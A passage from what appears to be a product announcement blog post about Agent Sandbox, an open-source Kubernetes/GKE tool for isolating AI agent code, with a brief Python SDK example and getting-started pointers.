Teams building today’s agentic AI or reinforcement learning (RL) systems should not have to be infrastructure experts. We built Agent Sandbox with AI engineers in mind, designing an API and Python SDK that lets them manage the lifecycle of their sandboxes, without worrying about the underlying infrastructure.
from agentic_sandbox import Sandbox

# The SDK abstracts all YAML into a simple context manager
with Sandbox(template_name="python3-template", namespace="ai-agents") as sandbox:

    # Execute a command inside the sandbox
    result = sandbox.run("print('Hello from inside the sandbox!')")
This separation of concerns enables both an AI developer-friendly experience and the operational control and extensibility that Kubernetes administrators and operators expect.
Get started today
Agentic AI represents a profound shift for software development and infrastructure teams. Agent Sandbox and GKE can help deliver the isolation and performance your agents need. Agent Sandbox is available in open source and can be deployed on GKE today. GKE Pod Snapshots is available in limited preview and will be available to all GKE customers later this year. To get started, check out the Agent Sandbox documentation and quick start. We are excited to see what you build!